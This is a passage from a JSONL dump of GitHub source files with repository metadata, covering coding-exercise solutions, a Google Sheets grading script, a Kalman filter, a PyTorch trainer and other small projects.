cv2.circle(img1, ext3, 5, color, -1)\n \n cornerList = [ext0, ext3, ext2, ext1]\n if 100 < x_max - x_min < 200 and 100 < y_max - y_min < 200: \n continue \n desiredCoordinates = [(x_min, y_min), (x_max, y_min), (x_min, y_max), (x_max, y_max)]\n self.gethomographyMat(cornerList, desiredCoordinates, img1)\n\n \np = AR_Detect()\np.cornerDetector()","repo_name":"ameyakonk/Image-and-3D-cube-superimposition-on-AR-tag","sub_path":"src/Cube_code_detection.py","file_name":"Cube_code_detection.py","file_ext":"py","file_size_in_byte":7070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71528967452","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@created: 31.10.20\n@author: felix\n\"\"\"\nfrom collections import Counter\n\n\nif __name__ == '__main__':\n group_size = int(input().rstrip())\n k = input().rstrip().split()\n c_dict = Counter(k)\n print(sorted(c_dict.items(), key=lambda x: x[1])[0][0])\n","repo_name":"FelixTheC/hackerrank_exercises","sub_path":"hackerrank/hkr_captains_room.py","file_name":"hkr_captains_room.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72313203610","text":"import csv\nimport os\n\nimport pygsheets\nfrom git import Repo\nimport git\n\nclass Grader:\n\n def csv_converter(self, input_path, output_path):\n \"\"\"\n Converts a comma delimited csv file to a tab delimited csv file.\n :param input_path:\n :param output_path:\n \"\"\"\n print(\"Converting CSV to tab-delimited file...\")\n print('Path: ' + input_path)\n with open(input_path) as inputFile:\n with open(output_path, 'w+', newline='', encoding='utf-16') as outputFile:\n reader = csv.reader(inputFile)\n for row in reader:\n outputFile.write('\\t'.join(row)+'\\n')\n\n #reader = csv.DictReader(inputFile, delimiter=',')\n #writer = csv.DictWriter(outputFile, reader.fieldnames, delimiter='\\t', dialect='excel-tab')\n #writer.writeheader()\n #writer.writerows(reader)\n\n #csvwriter = csv.writer(reader.fieldnames, dialect='excel-tab')\n #csv_writerows(csvwriter, reader, encoding='utf-16')\n os.remove(input_path)\n print(\"Conversion complete.\")\n\n\n def grade_students(self, spreadsheet_url=None):\n\n DONT_GRADE = ['ASD009','haa037', 'tny009']\n DO_GRADE = ['ekj008']\n GRADED_STUDENTS_FILE = \"GRADED_STUDENTS.txt\"\n #SPREADSHEET_URL = spreadsheet_url\n\n if not spreadsheet_url:\n SPREADSHEET_URL = str(input(\"Paste the link to your Google Sheets gradings: \"))\n else:\n SPREADSHEET_URL = spreadsheet_url\n\n if not SPREADSHEET_URL:\n print(\"No URL given, closing down...\")\n return\n\n # Authorize pygsheets\n client = pygsheets.authorize()\n print(\"Authorized!\")\n\n # Get grading sheet\n try:\n grading_spreadsheet = client.open_by_url(SPREADSHEET_URL)\n print(\"Got the spreadsheet!\")\n except pygsheets.exceptions.NoValidUrlKeyFound:\n print(\"Couldn't find a valid spreadsheet, stopping script...\")\n return\n\n # Create graded students file.\n with open(GRADED_STUDENTS_FILE, 'w') as name_file:\n name_file.write(\"GRADED STUDENTS: \\n\")\n name_file.close()\n\n grading_sheets = grading_spreadsheet.worksheets()\n\n # Go through each individual sheet.\n for sheet in grading_sheets:\n student_id = sheet.get_value('D2')\n\n\n # Skip the DONT_GRADE students.\n if student_id not in DO_GRADE:\n continue\n\n if student_id in DONT_GRADE:\n continue\n\n print('Student ID: ' + student_id)\n\n\n # 1. Clone the student repo.\n\n curr_repo_path = 'student_repos/'+student_id\n student_repo = Repo.init(curr_repo_path)\n try:\n origin = student_repo.create_remote('origin', 'https://retting.ii.uib.no/' + student_id + '/inf101.v19.sem2')\n #origin = student_repo.create_remote('origin', 'https://retting.ii.uib.no/'+ student_id +'/python-pushing-est') # Testing purposes\n\n except git.exc.GitCommandError:\n print(\"You have already cloned this repo in here!\")\n origin = student_repo.remote('origin')\n\n # TESTS AND SHIT\n assert origin.exists()\n assert origin == student_repo.remotes.origin == student_repo.remotes['origin']\n try:\n origin.fetch()\n except git.exc.GitCommandError:\n if student_id:\n print(\"Didn't find any student ID.\")\n else:\n print(\"{} is not a valid student ID.\".format(student_id))\n\n print(\"Going to next sheet...\")\n continue\n\n student_repo.create_head('master', origin.refs.master) # create local branch \"master\" from remote \"master\"\n student_repo.heads.master.set_tracking_branch(origin.refs.master) # set local \"master\" to track remote \"master\n student_repo.heads.master.checkout() # checkout local \"master\" to working tree\n\n # lazy renaming\n repo = student_repo\n\n # 2. MAKE THE GRADING BRANCH\n try:\n repo.git.checkout('grading')\n print(\"Used previous branch.\")\n\n except git.exc.GitCommandError:\n repo.git.branch('grading')\n repo.git.checkout('grading')\n print(\"Made new branch.\")\n\n\n # 3. Save the student's sheet.\n commas_sheet_name = student_id + '_commas'\n finished_sheet_name = student_id\n sheet.export(file_format = pygsheets.ExportType.CSV, filename=commas_sheet_name, path=curr_repo_path+'/')\n\n # Converts the csv.\n input_path = curr_repo_path+'/' + commas_sheet_name + '.csv'\n output_path = curr_repo_path+'/' + finished_sheet_name +'.csv'\n self.csv_converter(input_path=input_path, output_path=output_path)\n\n\n\n # 4. COMMIT AND PUSH\n repo.git.add('--all')\n repo.index.commit(\"FINAL GRADING\")\n repo.git.push(\"origin\", \"HEAD\")\n print(\"Pushed to repo!\")\n\n\n # 5. Save the IDs of the student's that have received grading.\n with open(GRADED_STUDENTS_FILE, 'a') as name_file:\n name_file.write(student_id + '\\n')\n name_file.close()\n","repo_name":"Zylvian/py_googlesheets_grading","sub_path":"py_googlesheets_grading/google_sheets_grading_script.py","file_name":"google_sheets_grading_script.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16054041827","text":"#!/usr/bin/env python3\nimport sys\n\nsum_ = 0\n\nfor line in sys.stdin:\n for output in line.split(\" | \")[1].split():\n sum_ += len(output) in (2, 3, 4, 7)\n\nprint(sum_)\n","repo_name":"pauldraper/advent-of-code-2021","sub_path":"problems/day-08/part_1.py","file_name":"part_1.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26464427907","text":"from enum import Enum, auto\nfrom math import atan2, cos, sin\nfrom textwrap import dedent\n\nfrom maths import Coord\nfrom ship import AX00SpaceFreighter\nfrom world import Planet\n\n\nclass State(Enum):\n GROUNDED = auto()\n TRAVELING = auto()\n ARRIVED = auto()\n\n\nclass Player(Coord):\n def __init__(self, name=\"Anon\"):\n self.location = None\n self.name = name\n self.age = 21\n\n self.state = State.GROUNDED\n\n self.credits = 20000\n\n self.inventory = []\n self.spaceShip = AX00SpaceFreighter()\n\n self.destination = None\n self.startPos = None\n self.targetMessage = None\n\n def startTravel(self, dest: Planet, target_message):\n if self.spaceShip is None:\n return\n self.x, self.y = self.location.x, self.location.y\n self.startPos = Coord(self.x, self.y)\n self.destination = dest\n self.state = State.TRAVELING\n self.targetMessage = target_message\n print(self.targetMessage)\n\n async def updateTargetMessage(self):\n if self.state is not State.TRAVELING:\n return\n if self.targetMessage is not None:\n try:\n perc = int(self.travelPercent / 2)\n fill = int(50 - perc)\n string = (\"=\" * perc) + (\"-\" * fill)\n await self.targetMessage.edit(content=f\"`traveling to '{self.destination.name}' [{string}]`\")\n except Exception as e:\n print(e)\n self.targetMessage = None\n pass\n\n def tick(self):\n self.age += 0.1\n\n if self.state is State.TRAVELING:\n angle = atan2(self.destination.y - self.y, self.destination.x - self.x)\n self.x += cos(angle) * self.spaceShip.baseSpeed\n self.y += sin(angle) * self.spaceShip.baseSpeed\n\n if self.dist(self.destination) < 1.0:\n self.x = self.destination.x\n self.y = self.destination.y\n self.location = self.destination\n self.state = State.GROUNDED\n\n def locate(self, universe):\n planet, system, galaxy = universe.getPlanetByName(self.location.name)\n localeStr = f\"You are on the planet {planet.name}\"\n if self.state is State.TRAVELING:\n localeStr = f\"You are traveling to {self.destination.name} from {self.location.name}\"\n localeStr += f\" ({self.travelPercent}%)\"\n return dedent(f\"\"\"\n {planet.toStr()}\\n\n {localeStr} in\n the '{system.name}' system within the '{galaxy.name}' galaxy\n \"\"\").replace('\\n', ' ')\n\n def locateLocal(self):\n localeStr = f\"You are on the planet {self.location.name}\"\n if self.state is State.TRAVELING:\n localeStr = f\"You are traveling to {self.destination.name} from {self.location.name}\"\n localeStr += f\" ({self.travelPercent}%)\"\n return localeStr\n\n @property\n def travelPercent(self):\n startDist = self.startPos.dist(self.destination)\n dist = self.dist(self.destination)\n return 100 - int(100.0 * float(dist / startDist))\n\n def __str__(self):\n lns = [\n f\"name: {self.name}\",\n f\"age: {self.age}\",\n f\"location: {self.location.name}\"\n ]\n\n if self.state is State.TRAVELING:\n lns.append(f\"Traveling to {self.destination.name} ({self.travelPercent}%)\")\n\n num = 0\n for ln in lns:\n if len(ln) > num:\n num = len(ln)\n\n res = \"+\" + \"-\" * num + \"+\\n\"\n for ln in lns:\n res += \"|\" + ln + \" \" * (num - len(ln)) + \"|\\n\"\n res += \"+\" + \"-\" * num + \"+\\n\"\n return res\n\n","repo_name":"SkyVault/GravyRPG","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31387222057","text":"import gym\n\nfrom utils import *\n\n\n\n\nif __name__ == \"__main__\":\n env = gym.make('Taxi-v3')\n\n conf = load_conf(\"conf.yaml\")\n AgentModule = AgentFactory.create_agent(\"Expected-SARSA\")\n agent = AgentModule(env.observation_space.n, env.action_space.n, conf)\n avg_rewards, best_avg_reward = train(env, agent, conf)\n interact(env, agent)\n\n #compare\n # compare(env, [\"Q-learning\", \"SARSA\", \"Expected-SARSA\"])\n #NOTE: available algorithms are: [\"Q-learning\", \"SARSA\", \"Expected-SARSA\"]","repo_name":"Anwarvic/taxi-v3-RL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"71372007132","text":"from sys import stdin,stdout\n\nt = int(stdin.readline().strip())\n\nfor _ in range(t):\n c = list(map(int, stdin.readline().split()))\n c.sort(reverse=True)\n total = c[1]-c[2]\n c[0],c[1] = c[0]-total,c[1]-total\n k = min(c[0]-c[1],c[1])\n total += k*2\n c[1] = c[1] - k\n total += 3*(c[1]//2) + c[1]%2\n stdout.write(\"{}\\n\".format(total))\n","repo_name":"xiema/competitive","sub_path":"codeforces/old/sweetprob.py","file_name":"sweetprob.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30076043247","text":"\"\"\"\r\n\n\nWrite a function that takes a string and calculates the number of letters and\ndigits within it. Return the result in a dictionary.\n\n### Examples\n\n count_all(\"Hello World\") ➞ { \"LETTERS\": 10, \"DIGITS\": 0 }\n \n count_all(\"H3ll0 Wor1d\") ➞ { \"LETTERS\": 7, \"DIGITS\": 3 }\n \n count_all(\"149990\") ➞ { \"LETTERS\": 0, \"DIGITS\": 6 }\n\n### Notes\n\n * Tests contain only alphanumeric characters.\n * Spaces are not letters.\n * All tests contain valid strings.\n\n\"\"\"\r\n\nimport string\ndef count_all(txt):\n lettcount = 0\n digicount = 0\n \n for i in txt:\n if i in string.ascii_lowercase or i in string.ascii_uppercase:\n lettcount += 1\n elif i in \"0123456789\":\n digicount += 1\n \n \n return {'LETTERS':lettcount,'DIGITS':digicount}\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"KEz3TAQfh9WxSZMLH_9.py","file_name":"KEz3TAQfh9WxSZMLH_9.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18555314035","text":"\"\"\"Схемы для выдачи списка книг.\"\"\"\nimport datetime\n\nfrom pydantic.v1 import BaseModel\n\nfrom domain.book.values import BookAuthor, BookGenre, BookName\nfrom entrypoints.web.schema.book.short import BookShortSchema\nfrom entrypoints.web.schema.list_params import ListSchema\nfrom infrastructure.repository.base.list import SQLFilter\n\n\nclass ListBookQueryParams(ListSchema):\n \"\"\"Query-параметры для уточнения запроса на выдачу списка Книг.\n\n None здесь подходит тк все поля у книг всегда заполнены. Так-то следует использовать что-то вроде NotSet.\n \"\"\"\n\n # Фильтры:\n name: BookName | None = None\n author: BookAuthor | None = None\n genre: BookGenre | None = None\n date_published: datetime.date | None = None\n downloadable: bool | None = None\n\n def to_sql_filters(self) -> list[SQLFilter] | None:\n \"\"\"Преобразование в sql-фильтры.\"\"\"\n filters = []\n if self.name is not None:\n filters.append(SQLFilter(\"name\", self.name))\n if self.author is not None:\n filters.append(SQLFilter(\"author\", self.author))\n if self.genre is not None:\n filters.append(SQLFilter(\"genre\", self.genre))\n if self.date_published is not None:\n filters.append(SQLFilter(\"date_published\", self.date_published))\n if self.downloadable is not None:\n filters.append(SQLFilter(\"downloadable\", self.downloadable))\n return filters or None\n\n\nclass ListBookOutputSchema(BaseModel):\n \"\"\"Схема выдачи списка книг.\"\"\"\n\n books: list[BookShortSchema]\n","repo_name":"Gerleff/ddd-book-manager","sub_path":"src/entrypoints/web/schema/book/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42187897547","text":"\"\"\"\ntrain a pytorch image classification model using device-agnostic code.\n\"\"\"\nimport os\nimport torch\nfrom torchvision import transforms\nimport data_setup, engine, model, utils \nfrom timeit import default_timer as timer \n\n# Set random seeds\ntorch.manual_seed(42) \ntorch.cuda.manual_seed(42)\n\n# Set number of epochs\nNUM_EPOCHS = 5\nBATCH_SIZE = 32\nHIDDEN_UNITS = 10\nLEARNING_RATE = 0.001\n\ntrain_dir = \"data/pizza_steak_sushi/train\"\ntest_dir = \"data/pizza_steak_sushi/test\"\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n# Create transforms\ndata_transform = transforms.Compose([\n transforms.Resize((64,64)),\n transforms.ToTensor()\n])\n\n# get dataloaders and class names\ntrain_dataloader, test_dataloader, class_names = data_setup.create_dataloaders(\n train_dir = train_dir,\n test_dir = test_dir,\n transform= data_transform,\n batch_size = BATCH_SIZE\n)\n\n# Recreate an instance of TinyVGG\nmodel = model.TinyVGG(input_shape=3, # number of color channels (3 for RGB) \n hidden_units=HIDDEN_UNITS, \n output_shape=len(class_names)).to(device)\n\n# Setup loss function and optimizer\nloss_fn = torch.nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(params=model.parameters(), lr=LEARNING_RATE)\n\n# Start the timer\nstart_time = timer()\n\n# Train model_0 \nmodel_results = engine.train(model=model, \n train_dataloader=train_dataloader,\n test_dataloader=test_dataloader,\n optimizer=optimizer,\n loss_fn=loss_fn, \n epochs=NUM_EPOCHS,\n device=device)\n\n# End the timer and print out how long it took\nend_time = timer()\nprint(f\"[INFO] Total training time: {end_time-start_time:.3f} seconds\")\n\n# Save the model\nutils.save_model(model=model,\n target_dir=\"models\",\n model_name=\"05_going_modular_script_mode_tinyvgg_model.pth\")\n","repo_name":"jamesshoemake/pytorch_models","sub_path":"going_modular/going_modular/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29993753457","text":"\ndef spiral_order(lst):\n result = []\n if len(lst) == 0:\n return []\n elif len(lst) == 1 and len(lst[0]) == 1:\n return [lst[0][0]]\n elif len(lst) == 1 and len(lst[0]) > 1:\n for j in range(len(lst[0])):\n result.append(lst[0][j])\n return result\n else:\n for j in range(len(lst[0])):\n result.append(lst[0][j])\n for i in range(1, len(lst) - 1):\n result.append(lst[i][-1])\n for j in range(len(lst[0]) - 1, -1, -1):\n result.append(lst[-1][j])\n for i in range(len(lst) - 2, 0, -1):\n result.append(lst[i][0])\n lst_remain = []\n for i in range(1, len(lst) - 1):\n lst_remain.append([lst[i][j] for j in range(1, len(lst[0]) - 1)])\n return result + spiral_order(lst_remain)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"jT7PY2yTWTuxcqpJe_16.py","file_name":"jT7PY2yTWTuxcqpJe_16.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41367207958","text":"from fiscalsim_us.model_api import *\n\n\nclass va_refundable_credits(Variable):\n value_type = float\n entity = TaxUnit\n label = \"line 26 on the va tax return\"\n unit = USD\n definition_period = YEAR\n defined_for = StateCode.VA\n\n def formula(tax_unit, period, parameters):\n line_19 = tax_unit(\"va_witholding\", period)\n\n line_19b = tax_unit(\"va_spouse_witholding\", period)\n\n line_20 = tax_unit(\"va_estimated_tax_payments_for_tax_year\", period)\n\n line_21 = tax_unit(\n \"va_amount_of_prior_year_overpayment_applied_to_current_year\",\n period,\n )\n\n line_22 = tax_unit(\"va_extension_payments\", period)\n\n line_23 = tax_unit(\"va_tax_credit_for_low_income_individuals\", period)\n\n line_24 = tax_unit(\"va_credits_from_enclosed_schedule_cr\", period)\n\n return (\n line_19\n + line_19b\n + line_20\n + line_21\n + line_22\n + line_24\n + line_23\n )\n","repo_name":"TheCGO/fiscalsim-us","sub_path":"fiscalsim_us/variables/gov/states/va/tax/income/va_refundable_credits.py","file_name":"va_refundable_credits.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"34980131319","text":"import torch\nfrom torch.nn import Linear, Module, MSELoss\nfrom torch.optim import SGD, RMSprop, Adam\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# define linear function\n# x = np.linspace(0, 20, 500)\n# y = 5 * x +7\n# plt.plot(x, y)\n# plt.savefig('linear_function.pdf')\n# plt.show()\n\nx = np.random.rand(256)\nnoise = np.random.rand(256) / 4\ny = x * 5 + 7 + noise\n\n# df = pd.DataFrame()\n# df['x'] = x\n# df['y'] = y\n# sns.lmplot(x='x', y='y', data=df)\n# plt.savefig('linear_function_noise.pdf')\n# plt.show()\n\nmodel = Linear(1, 1)\ncriterion = MSELoss()\n# optim = SGD(model.parameters(), lr=0.01)\n# optim = RMSprop(model.parameters(), lr=0.01 ,alpha = 0.99)\noptim = Adam(model.parameters(), lr=0.001, betas = (0.9, 0.999), eps = 1e-08)\n\nepochs = 15001\n\nx_train = x.reshape(-1, 1).astype('float32')\ny_train = y.reshape(-1, 1).astype('float32')\n\nfor i in range(epochs):\n\n\tinputs = torch.from_numpy(x_train)\n\tlables = torch.from_numpy(y_train)\n\n\toutputs = model(inputs)\n\n\toptim.zero_grad()\n\n\tloss = criterion(outputs, lables)\n\n\tloss.backward()\n\n\toptim.step()\n\tif i % 100 == 0:\n\t\tprint('epoch: {}, loss: {:1.4f}.'.format(i, loss.data.item()))\n\ntorch.save(model, 'linear_regression_pytorch.pkl')\n# [w, b] = model.parameters()\n# print(w.item(), b.item())\n\npredicted = model.forward(torch.from_numpy(x_train)).data.numpy()\nplt.scatter(x_train, y_train, c = 'blue', label = 'data', alpha =0.35)\nplt.plot(x_train, predicted, c = 'red', label = 'predicted', alpha = 1)\nplt.legend(loc = 'best', frameon = True)\nplt.savefig('linear_regression_pytorch.pdf')\nplt.show()\n","repo_name":"ceadmond/GRUNK-Pytorch-Tutorial","sub_path":"Chapter 2/dl_basic.py","file_name":"dl_basic.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71396029210","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\n\ntorch.manual_seed(17) # eliminate random.\n\nbatch_size = 100\n\n# MNIST dataset\ntrain_dataset = torchvision.datasets.MNIST(root='../../data', \n train=True, \n transform=transforms.ToTensor(),\n download=True)\n\ntest_dataset = torchvision.datasets.MNIST(root='../../data', \n train=False, \n transform=transforms.ToTensor())\n\n# Data loader\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, \n batch_size=batch_size, \n shuffle=True)\n\ntest_loader = torch.utils.data.DataLoader(dataset=test_dataset, \n batch_size=batch_size, \n shuffle=False)\n\n# Model\nclass Model(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self.linear = torch.nn.Linear(784, 10)\n\n def forward(self, x):\n return self.linear(x)\n\n# initialize\nmodel = Model()\n\nfor images, labels in train_loader:\n print(images.shape) # torch.Size([100, 1, 28, 28])\n images = images.view(-1, 784)\n print(images.shape) # torch.Size([100, 784])\n\n # forward\n predict = model(images)\n print(predict.shape)\n exit()\n \n'''\ntorch.Size([100, 1, 28, 28])\ntorch.Size([100, 784])\ntorch.Size([100, 10])\n'''","repo_name":"adldotori/how-to-make-face-answer","sub_path":"number_classification/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7169606665","text":"import pycountry\n\nfrom world_locations.models import Country, Subdivision, SubdivisionType\n\ndef create_subdivision(subdivision, country):\n \"\"\"\n Recursively create Django Subdivision objects\n \n Note:\n subdivision is a pycountry object\n country is a Django object\n \"\"\"\n t, created = SubdivisionType.objects.get_or_create(name=subdivision.type)\n sd, created = Subdivision.objects.get_or_create(code=subdivision.code,\n country=country,\n name=subdivision.name,\n subdivision_type=t)\n if subdivision.parent_code:\n parent = subdivision.parent\n p = create_subdivision(parent, country)\n sd.parent = p\n sd.save()\n\n return sd\n \n\nfor country in pycountry.countries.objects:\n c, created = Country.objects.get_or_create(alpha2=country.alpha2,\n alpha3=country.alpha3,\n name=country.name,\n numeric=country.numeric,\n published=True)\n try:\n c.official_name=country.official_name\n c.save()\n except AttributeError:\n pass\n\n try:\n subdivisions = pycountry.subdivisions.get(country_code=c.alpha2)\n except KeyError:\n subdivisions = []\n for subdivision in subdivisions:\n create_subdivision(subdivision, c)\n \n","repo_name":"lincolnloop/django-locations","sub_path":"world_locations/utils/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"19038836150","text":"articles_dict = [\n {\n \"title\": \"Endless ocean waters.\",\n \"author\": \"Jhon Stark\",\n \"year\": 2019,\n },\n {\n \"title\": \"Oceans of other planets are full of silver\",\n \"author\": \"Artur Clark\",\n \"year\": 2020,\n },\n {\n \"title\": \"An ocean That cannot be crossed.\",\n \"author\": \"Silver Name\",\n \"year\": 2021,\n },\n {\n \"title\": \"The ocean that you love.\",\n \"author\": \"Golden Gun\",\n \"year\": 2021,\n },\n]\n\n\ndef find_articles(key, letter_case=False):\n result = list()\n if letter_case:\n for i in range(len(articles_dict)):\n if articles_dict[i][\"title\"].find(key) != -1 or articles_dict[i][\"author\"].find(key) != -1:\n result.append(articles_dict[i])\n else:\n for i in range(len(articles_dict)):\n if (articles_dict[i][\"title\"].lower()).find(key) != -1 or (articles_dict[i][\"author\"].lower()).find(key) != -1:\n result.append(articles_dict[i])\n return result\nprint(find_articles(\"tha\"))","repo_name":"yehor393/GOIT","sub_path":"P5E2.py","file_name":"P5E2.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21632084924","text":"# Idiom 1: Use tuples to unpack data\n\nfoods = ['Banana', 'Apple', 'Coffee']\n\n(one, two, three) = foods\n\nprint('{0}, {1}, {2}'.format(one, two, three))\n\n# Idiom 2: Use _ as a placeholder for data in a tuple that should be ignored\n\n(one, two, _) = ['Banana', 'Apple', 'Coffee']\n\nprint('{0}, {1}'.format(one, two))\n\n# Idiom 3: Avoid using a temporary variable in Python. We can use tuples to make our intertion more clear.\n\nfoo = 'Foo'\nbar = 'Bar'\n\n(foo, bar) = (bar, foo)\n\nassert(foo == 'Bar')\nassert(bar == 'Foo')","repo_name":"csheare/python_tricks","sub_path":"blankbale/section2/tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"21694987879","text":"# coding=utf-8\nimport json\nimport os\n\nfrom vp_manager.config import const\nfrom vp_manager.config.account import project_path\n\nmission_path = os.path.join(project_path, const.MISSION_DATA_PATH)\nfollower_path = os.path.join(project_path, const.FOLLOWER_DATA_PATH)\n\nwith open(mission_path, 'r', encoding='utf-8') as f:\n mission_list = json.loads(f.read())\n\nwith open(follower_path, 'r', encoding='utf-8') as f:\n follower_list = json.loads(f.read())\n\nreward_list = {\n '187569': const.MRT_BOX_CLOTH, # 掮灵的裁缝促进微粒\n '187572': const.MRT_BOX_GRASS, # 掮灵的草药促进微粒\n '187573': const.MRT_BOX_MAGIC, # 掮灵的附魔促进微粒\n '187574': const.MRT_BOX_FISH, # 掮灵的满溢之桶\n '187413': const.MRT_EXP_ITEM, # 3000 exp\n '187414': const.MRT_EXP_ITEM, # 7500 exp\n '184646': const.MRT_BOX_MINE, # 英雄的采矿箱\n '184647': const.MRT_BOX_GRASS, # 英雄的草药箱\n '184638': const.MRT_BOX_FISH, # 英雄的鱼箱\n '184637': const.MRT_BOX_MEAT, # 英雄的肉箱\n '184648': const.MRT_BOX_MAGIC, # 英雄的附魔箱\n '184645': const.MRT_BOX_LEATHER, # 英雄的剥皮箱\n '184644': const.MRT_BOX_CLOTH, # 英雄的裁缝箱\n}\n\n","repo_name":"tqqq/ventureplan-assistant","sub_path":"vp_manager/data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39839928359","text":"import numpy as np\nfrom filterpy.kalman import KalmanFilter as KF\n\n\nclass KalmanFilter():\n def __init__(self, initial_state=np.array([0., 0., 0., 0]),\n dt=1/20.,\n measurement_uncertainty_x=2,\n measurement_uncertainty_y=2,\n process_uncertainty=1,\n verbose=False, frame=1):\n self.name = \"KalmanFilter\"\n self.verbose = verbose\n self.kf = KF(dim_x=4, dim_z=2)\n\n self.kf.x = initial_state # state (x and dx)\n self.process_uncertainty = process_uncertainty\n self.measurement_uncertainty_x = measurement_uncertainty_x\n self.measurement_uncertainty_y = measurement_uncertainty_y\n self.frame = frame\n self.frames = []\n self.kf.F = np.array([[1, 0, dt, 0],\n [0, 1, 0, dt],\n [0, 0, 1, 0],\n [0, 0, 0, 1]]) # state transition matrix\n\n self.kf.H = np.array([[1., 0., 0., 0.],\n [0., 1., 0., 0.]]) # Measurement function\n\n self.kf.R = np.array([[self.measurement_uncertainty_x**2, 0],\n [0, self.measurement_uncertainty_y**2]])\n self.Q = np.array([\n [(dt**4)/4, 0, (dt**3)/2, 0],\n [0, (dt**4)/4, 0, (dt**3)/2],\n [(dt**3)/2, 0, dt**2, 0],\n [0, (dt**3)/2, 0, dt**2]\n ])\n self.kf.Q = self.Q * self.process_uncertainty\n if self.verbose:\n print(\"Initializing Kalman Filter:\\ndf = {dt}\".format(dt=dt))\n\n def update_process_uncertainty(self):\n self.kf.Q = self.Q * self.process_uncertainty\n\n def update_measurement_uncertainty(self):\n self.kf.R = np.array([[self.measurement_uncertainty_x**2, 0],\n [0, self.measurement_uncertainty_y**2]])\n\n def increase_process_uncertainty(self, alpha=0.01):\n self.process_uncertainty *= (1 + alpha)\n\n def decrease_process_uncertainty(self, alpha=0.01):\n self.process_uncertainty *= (1 - alpha)\n\n def smooth(self, zs, decrease_process_uncertainty=False, occluded=[]):\n\n smoothed_trajectory = []\n predicted_trajectory = []\n for i, z in enumerate(zs):\n if len(occluded) > 0:\n\n if occluded[i]:\n\n self.measurement_uncertainty_x = 0.1\n self.measurement_uncertainty_y = 0.1\n self.process_uncertainty = 0.1\n\n else:\n self.measurement_uncertainty_x = 0.1\n self.measurement_uncertainty_y = 0.1\n self.process_uncertainty = 0.1\n self.update_measurement_uncertainty()\n self.kf.predict()\n predicted_trajectory.append(\n np.array([[self.kf.x[0], self.kf.x[1]]]))\n\n if not np.isnan(z[0]):\n\n self.kf.update(z)\n smoothed_trajectory.append(\n np.array([[self.kf.x[0], self.kf.x[1]]]))\n\n if decrease_process_uncertainty:\n self.decrease_process_uncertainty()\n self.update_process_uncertainty()\n\n return np.concatenate(smoothed_trajectory), np.concatenate(predicted_trajectory)\n\n def step(self, z, decrease_process_uncertainty=False, frame=None):\n if frame > self.frame:\n self.kf.predict()\n pred_x = self.kf.x\n assert frame not in self.frames\n self.update(z, frame=frame)\n if decrease_process_uncertainty:\n self.decrease_process_uncertainty()\n self.update_process_uncertainty()\n\n def predict(self, frame=None, increase_process_uncertainty=False):\n if increase_process_uncertainty:\n self.increase_process_uncertainty()\n self.update_process_uncertainty()\n self.kf.predict()\n self.frame = frame\n x = np.expand_dims(self.kf.x[:2], axis=0)\n\n return x\n\n def update(self, x, frame=None):\n self.kf.update(x)\n if frame is not None:\n self.frames.append(frame)\n\n def predictSequence(self, time):\n output = []\n for t in time:\n output.append(self.predict())\n return np.concatenate(output)\n","repo_name":"dendorferpatrick/QuoVadis","sub_path":"src/quovadis/trajectory_predictor/kalman_filter.py","file_name":"kalman_filter.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"32"} +{"seq_id":"18005206252","text":"import 